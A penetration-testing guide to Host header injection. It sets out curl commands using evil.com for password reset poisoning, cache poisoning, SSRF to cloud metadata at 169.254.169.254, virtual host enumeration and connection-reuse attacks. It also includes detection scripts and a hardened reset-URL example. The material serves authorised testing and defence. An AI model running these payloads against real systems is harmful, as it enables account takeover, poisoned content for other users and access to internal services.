Testing for Host Header Injection


When to Use


  • When testing password reset functionality for token theft via host manipulation
  • During assessment of web caching behavior influenced by Host header values
  • When testing virtual host routing and server-side request processing
  • During penetration testing of applications behind reverse proxies or load balancers
  • When evaluating SSRF potential through Host header manipulation

Prerequisites


  • Burp Suite for intercepting and modifying Host headers
  • Understanding of HTTP Host header role in virtual hosting and routing
  • Knowledge of the proxy override headers that can stand in for Host (X-Forwarded-Host, X-Host, Forwarded) or rewrite the path (X-Original-URL, X-Rewrite-URL)
  • Access to an attacker-controlled domain for receiving poisoned requests
  • Burp Collaborator or interact.sh for out-of-band detection
  • Multiple test accounts for password reset testing
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Workflow


Step 1 — Test Basic Host Header Injection


```bash
# Supply an arbitrary Host header and check whether evil.com is reflected
# in the response (Location, Set-Cookie Domain, absolute links, script src)
curl -H "Host: evil.com" http://target.com/ -v

# Double Host header: a front-end and back-end that pick different copies
# can be told apart by which host the response reflects (a 400 means both reject it)
curl -H "Host: target.com" -H "Host: evil.com" http://target.com/ -v

# Host header with port injection: some validators stop at the ':' and only
# check target.com, while URL builders keep the whole value
curl -H "Host: target.com:evil.com" http://target.com/ -v
curl -H "Host: target.com:@evil.com" http://target.com/ -v

# Absolute URL in the request line with a different Host header
# (--request-target needs curl 7.55 or newer)
curl --request-target "http://target.com/" -H "Host: evil.com" http://target.com/ -v

# Check for different virtual host access
curl -H "Host: admin.target.com" http://target.com/ -v
curl -H "Host: internal.target.com" http://target.com/ -v
curl -H "Host: localhost" http://target.com/ -v
```

Step 2 — Test Password Reset Poisoning


```bash
# Trigger a password reset with a modified Host header.
# The reset link may be built from the Host header value.
# Use one of your own test accounts as the victim so the email lands in a mailbox you control.
curl -X POST http://target.com/forgot-password \
  -H "Host: evil.com" \
  -d "email=victim@target.com"
# If the reset email contains http://evil.com/reset?token=xxx,
# the attacker receives the token when the victim clicks the link.

# Try X-Forwarded-Host for password reset poisoning
curl -X POST http://target.com/forgot-password \
  -H "X-Forwarded-Host: evil.com" \
  -d "email=victim@target.com"

# Port-based injection in the reset URL (target.com:80 becomes userinfo, evil.com the host)
curl -X POST http://target.com/forgot-password \
  -H "Host: target.com:80@evil.com" \
  -d "email=victim@target.com"

# Test with various forwarding headers.
# X-Original-URL / X-Rewrite-URL rewrite the path rather than the host, so a bare
# hostname there usually just changes which route is hit; they are included for coverage.
for header in "X-Forwarded-Host" "X-Host" "X-Original-URL" "X-Rewrite-URL" "X-Forwarded-Server"; do
  curl -s -o /dev/null -X POST http://target.com/forgot-password \
    -H "$header: evil.com" \
    -d "email=victim@target.com"
  echo "Tested: $header"
done

# The RFC 7239 Forwarded header carries the host as a parameter, not a bare value
curl -X POST http://target.com/forgot-password \
  -H "Forwarded: host=evil.com" \
  -d "email=victim@target.com"
```

Step 3 — Test Web Cache Poisoning via Host Header


```bash
# If the caching layer uses the URL (without Host) as the cache key:
# add a cache-buster query string while testing so you only poison your own
# cache entry, and drop it for the final proof once the behaviour is confirmed.

# Poison the cache with a modified Host header
curl -H "Host: evil.com" "http://target.com/?cb=1" -v
# If the response is cached and contains evil.com links,
# all subsequent users of that cache entry receive the poisoned content.

# Test with X-Forwarded-Host for cache poisoning
curl -H "X-Forwarded-Host: evil.com" "http://target.com/login?cb=1" -v
# Check X-Cache, Age or CF-Cache-Status headers to see whether the response was cached

# Verify cache poisoning: request the same URL again WITHOUT the injected header
curl "http://target.com/login?cb=1" -v
# If the response still contains evil.com, the cache is poisoned

# Poison JavaScript URLs in cached pages
curl -H "X-Forwarded-Host: evil.com" "http://target.com/?cb=2"
# If the page loads <script src="//evil.com/static/app.js">,
# the attacker serves malicious JavaScript to every user served from that cache entry
```
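The checks in Step 1 (is the injected host reflected, and where?) and Step 3 (is the clean follow-up response served from cache and still carrying the injected host?) are easy to get wrong by eyeballing verbose curl output. The following is an added example, the editor's code rather than anything from the original skill, that makes both checks explicit: it parses a raw HTTP response, reports each place a canary host surfaces (redirect headers, cookie Domain, href/src/action URLs), and decides whether a later clean response is a poisoned cache hit. The responses are constructed, and evil.example stands in for your own canary domain.

```python
import re
from typing import Dict, List, Tuple

# Added example (editor's code, not part of the original skill). The responses
# below are constructed; evil.example stands in for your own canary domain.

URL_ATTR = r"""(href|src|action)=["'](?:https?:)?//"""   # href="http://…", src='//…', action="https://…"


def parse_response(raw: str) -> Tuple[int, Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into (status, headers, body).
    Header names are lower-cased; repeated headers are joined with ', '."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return status, headers, body


def find_host_reflections(canary: str, raw: str) -> List[str]:
    """Where does the injected host show up? Checks the places Host and
    X-Forwarded-Host usually leak into: redirects, cookie scoping, and
    absolute or protocol-relative URLs in href/src/action attributes."""
    _, headers, body = parse_response(raw)
    hits: List[str] = []
    for name in ("location", "content-location", "link"):
        if canary in headers.get(name, ""):
            hits.append(f"header {name}: {headers[name]}")
    if re.search(r"domain=[^;]*" + re.escape(canary), headers.get("set-cookie", ""), re.I):
        hits.append("set-cookie Domain attribute")
    for m in re.finditer(URL_ATTR + re.escape(canary) + r"""[^"']*""", body, re.I):
        hits.append(f"body {m.group(1).lower()}: {m.group(0)}")
    return hits


def looks_cached(headers: Dict[str, str]) -> bool:
    """Common cache-status signals that the response came from a cache."""
    for name in ("x-cache", "cf-cache-status", "x-cache-status"):
        if "hit" in headers.get(name, "").lower():
            return True
    age = headers.get("age", "0")
    return age.isdigit() and int(age) > 0


def cache_poisoned(canary: str, clean_raw: str) -> bool:
    """Step 3 verification: the response to a follow-up request that did NOT
    carry the injected header is served from cache and still contains the canary."""
    _, headers, _ = parse_response(clean_raw)
    return looks_cached(headers) and bool(find_host_reflections(canary, clean_raw))


CANARY = "evil.example"

# Constructed response to GET /login sent with X-Forwarded-Host: evil.example
POISONING_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "X-Cache: MISS\r\n"
    "Set-Cookie: session=abc; Domain=evil.example; Path=/\r\n"
    "\r\n"
    '<html><script src="//evil.example/static/app.js"></script>'
    '<a href="https://evil.example/login">Login</a></html>'
)

# Constructed response to the same URL requested afterwards with no injected header
CLEAN_RESPONSE = POISONING_RESPONSE.replace("X-Cache: MISS", "X-Cache: HIT\r\nAge: 12")

if __name__ == "__main__":
    for hit in find_host_reflections(CANARY, POISONING_RESPONSE):
        print("reflected:", hit)
    print("cache poisoned:", cache_poisoned(CANARY, CLEAN_RESPONSE))
```

Feed it the raw response saved with `curl -i` (or copied from Burp). A reflection in the first response alone is a finding for Step 1; only a reflection in the clean second response, together with a cache-hit signal, proves Step 3.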

Step 4 — Test SSRF via Host Header


```bash
# The back-end may use the Host header to decide where to make internal requests
curl -H "Host: internal-api.target.local" http://target.com/api/proxy

# Access cloud metadata via the Host header
curl -H "Host: 169.254.169.254" http://target.com/

# Internal port scanning: compare status codes and response times per port;
# a per-port difference means the back-end actually connected to the Host value
for port in 80 443 8080 8443 3000 5000 9200; do
  curl -H "Host: 127.0.0.1:$port" http://target.com/ -o /dev/null -w "%{http_code} %{time_total}s" -s
  echo " - Port $port"
done

# SSRF via an absolute URL in the request line
curl --request-target "http://internal-server/" -H "Host: internal-server" http://target.com/
```

Step 5 — Test Virtual Host Enumeration


```bash
# Enumerate virtual hosts; record status and size for each candidate so that
# anything differing from the default-vhost baseline stands out
for vhost in admin staging dev test api internal backend; do
  result=$(curl -H "Host: $vhost.target.com" http://target.com/ -o /dev/null -w "%{http_code} %{size_download}" -s)
  echo "$vhost.target.com - Status: ${result% *}, Size: ${result#* }"
done

# Check default virtual host behaviour (the baseline) and compare with the legitimate host response
curl -H "Host: nonexistent.target.com" http://target.com/ -v
curl -H "Host: target.com" http://target.com/ -v

# Access internal admin panels via virtual host
curl -H "Host: admin" http://target.com/
curl -H "Host: management.internal" http://target.com/
```

Step 6 — Test Connection-State Attacks


HTTP/1.1 connection reuse attack: some front-ends validate or route on the Host header of the first request on a TCP connection only. Send a legitimate first request, then reuse the same connection for a second request with an injected Host header.

In Burp Repeater, put both requests in a group, keep `Connection: keep-alive` on the first request, enable "Update Content-Length", and send the group in sequence over a single connection.

Request 1 (legitimate):

```http
GET / HTTP/1.1
Host: target.com
Connection: keep-alive

```

Request 2 (injected, same connection):

```http
GET /admin HTTP/1.1
Host: internal.target.com
Connection: close

```

If request 2 succeeds here but the same request on a fresh connection is rejected, the Host check is per-connection rather than per-request.

Combine with HTTP Request Smuggling: if the front-end validates Host but the back-end does not, smuggle a request carrying the modified Host header past the front-end check.
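The same probe can be run without Burp, which is useful for scripting it against several hosts or paths. The following is an added example, the editor's code rather than anything from the original skill: it builds the two requests, writes them on one TCP connection, and splits the concatenated responses by Content-Length so the second status code can be compared with that of a fresh-connection request. target.com, internal.target.com and port 80 are placeholders for a lab target you are authorised to test; the sample wire data is constructed.

```python
import socket
from typing import List, Tuple

# Added example (editor's code, not part of the original skill). target.com,
# internal.target.com and the port are placeholders for a lab target you are
# authorised to test.


def build_request(method: str, path: str, host: str, keep_alive: bool) -> bytes:
    """One minimal HTTP/1.1 request; Connection controls whether the socket stays open."""
    conn = "keep-alive" if keep_alive else "close"
    return f"{method} {path} HTTP/1.1\r\nHost: {host}\r\nConnection: {conn}\r\n\r\n".encode()


def build_connection_state_probe(legit_host: str, injected_host: str, path: str = "/admin") -> bytes:
    """Request 1 is clean and keeps the connection open; request 2 reuses that
    connection with a different Host. A front-end that validates or routes on
    the first request only will forward request 2 by the injected value."""
    return (build_request("GET", "/", legit_host, keep_alive=True)
            + build_request("GET", path, injected_host, keep_alive=False))


def split_responses(data: bytes, expected: int) -> List[Tuple[int, bytes]]:
    """Split concatenated HTTP/1.1 responses on one connection using
    Content-Length (chunked transfer encoding is not handled here)."""
    out: List[Tuple[int, bytes]] = []
    while data and len(out) < expected:
        head, sep, rest = data.partition(b"\r\n\r\n")
        if not sep:
            break
        status = int(head.split(b" ", 2)[1])
        length = 0
        for line in head.split(b"\r\n")[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        out.append((status, rest[:length]))
        data = rest[length:]
    return out


def send_probe(target: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Write both requests on a single TCP connection and read until the server closes."""
    chunks = []
    with socket.create_connection((target, port), timeout=timeout) as s:
        s.sendall(payload)
        while True:
            try:
                chunk = s.recv(65536)
            except socket.timeout:
                break
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


# Constructed sample of what two responses on one connection look like on the wire
SAMPLE_RESPONSES = (
    b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"
    b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    payload = build_connection_state_probe("target.com", "internal.target.com")
    raw = send_probe("target.com", 80, payload)  # assumed lab target
    for i, (status, body) in enumerate(split_responses(raw, 2), start=1):
        print(f"response {i}: {status} ({len(body)} bytes)")
```

Run the injected request once more on its own connection with plain curl; a 200 from the reused connection against a 4xx from the fresh one is the finding. For HTTPS wrap the socket with `ssl.create_default_context().wrap_socket(s, server_hostname=target)` before sending.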

Key Concepts


| Concept | Description |
|---|---|
| Host Header | HTTP header specifying the target virtual host for the request |
| Password Reset Poisoning | Injecting Host to make reset emails contain attacker-controlled URLs |
| Cache Poisoning via Host | Poisoning a CDN or proxy cache with responses containing an attacker-controlled host |
| Virtual Host Routing | Web server using the Host header to route requests to different applications |
| X-Forwarded-Host | Header set by proxies that some applications honour over Host |
| Connection State Attack | Exploiting persistent connections to send requests with different Host values |
| Server-Side Host Resolution | Backend code using the Host header for URL generation and redirects |

Tools & Systems


| Tool | Purpose |
|---|---|
| Burp Suite | HTTP proxy for Host header manipulation and analysis |
| Burp Collaborator | Out-of-band detection for Host header SSRF |
| ffuf | Virtual host brute-forcing with custom Host headers |
| gobuster vhost | Virtual host enumeration mode |
| Nuclei | Template-based scanning for Host header injection |
| param-miner | Burp extension for discovering unkeyed Host-related headers |

Common Scenarios


  1. Password Reset Token Theft — Poison Host header during password reset to make victim click a link pointing to attacker server, leaking reset token
  2. Web Cache Poisoning — Inject Host header to cache responses with attacker-controlled JavaScript URLs, achieving stored XSS for all users
  3. Internal Panel Access — Enumerate and access internal admin panels through virtual host manipulation
  4. SSRF to Cloud Metadata — Use Host header to redirect server-side requests to cloud metadata endpoints
  5. Routing Bypass — Bypass access controls by manipulating Host to route requests to unprotected backend instances

Output Format


```markdown
# Host Header Injection Report

## Findings

| # | Technique | Header | Impact | Severity |
|---|---|---|---|---|
| 1 | Password Reset Poisoning | Host: evil.com | Token theft | Critical |
| 2 | Cache Poisoning | X-Forwarded-Host: evil.com | Stored XSS | High |
| 3 | Virtual Host Access | Host: admin.target.com | Admin panel exposure | High |
| 4 | SSRF | Host: 169.254.169.254 | Metadata access | Critical |

## Remediation

- Validate the Host header against an allowlist of expected values and reject anything else
- Do not use the Host header (or X-Forwarded-Host) to generate URLs in password reset emails
- Configure the web server to reject requests with unrecognized Host values, with a default virtual host that serves nothing useful
- Set absolute base URLs in application configuration instead of deriving them from the request
- Strip X-Forwarded-Host and similar override headers at the edge unless your own proxy sets them
- Include the Host header and any honoured override header in the cache key so a poisoned response cannot be served to other users
```
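The first four remediation bullets describe the fix for the password reset case in Step 2. The following is an added example, the editor's code rather than anything from the original skill, showing the vulnerable URL builder next to a hardened one: the hardened version ignores forwarding headers, validates Host against an allowlist using the real URL authority grammar (which is what defeats `target.com:80@evil.com` and `target.com:evil.com`), and builds the link from a configured base URL. The allowlist, base URL and token are placeholders.

```python
from typing import Mapping
from urllib.parse import urlsplit

# Added example (editor's code, not part of the original skill). The allowlist,
# canonical base URL and token are placeholders for your own configuration.

ALLOWED_HOSTS = {"target.com", "www.target.com"}
CANONICAL_BASE = "https://target.com"   # comes from configuration, never from the request


class BadHostHeader(ValueError):
    """Raised when the Host header is not one this deployment serves."""


def reset_url_vulnerable(headers: Mapping[str, str], token: str) -> str:
    """The pattern the workflow above exploits: the link is built from
    X-Forwarded-Host when present, otherwise from Host, with no validation."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "")
    return f"https://{host}/reset?token={token}"


def validated_host(headers: Mapping[str, str]) -> str:
    """Accept only an allowlisted hostname, optionally with a numeric port.
    Parsing '//' + Host with the real authority grammar is what defeats the
    port and userinfo tricks: 'target.com:80@evil.com' has hostname evil.com
    and userinfo 'target.com:80', and 'target.com:evil.com' has no valid port."""
    raw = headers.get("Host", "")
    parts = urlsplit("//" + raw)
    if parts.username is not None or parts.password is not None:
        raise BadHostHeader(f"userinfo in Host: {raw!r}")
    if parts.path or parts.query or parts.fragment:
        raise BadHostHeader(f"path in Host: {raw!r}")
    try:
        parts.port                      # ValueError for non-numeric or out-of-range ports
    except ValueError:
        raise BadHostHeader(f"bad port in Host: {raw!r}") from None
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        raise BadHostHeader(f"unexpected Host: {raw!r}")
    return host


def reset_url_hardened(headers: Mapping[str, str], token: str) -> str:
    """Reject the request if Host is not ours, ignore every forwarding header,
    and build the link from the configured base so nothing in the request
    can steer where the token is sent."""
    validated_host(headers)
    return f"{CANONICAL_BASE}/reset?token={token}"


if __name__ == "__main__":
    probes = [
        {"Host": "target.com"},
        {"Host": "target.com", "X-Forwarded-Host": "evil.com"},
        {"Host": "target.com:80@evil.com"},
        {"Host": "target.com:evil.com"},
    ]
    for h in probes:
        try:
            safe = reset_url_hardened(h, "t0k3n")
        except BadHostHeader as exc:
            safe = f"rejected ({exc})"
        print(h, "\n  vulnerable:", reset_url_vulnerable(h, "t0k3n"), "\n  hardened:  ", safe)
```

Most frameworks expose the same control (Django's ALLOWED_HOSTS, for example); the point is that the allowlist check runs before any URL is built, and the link itself never depends on the request. Re-run the Step 2 probes after the change: every injected variant should now produce either a rejection or a link on the canonical host.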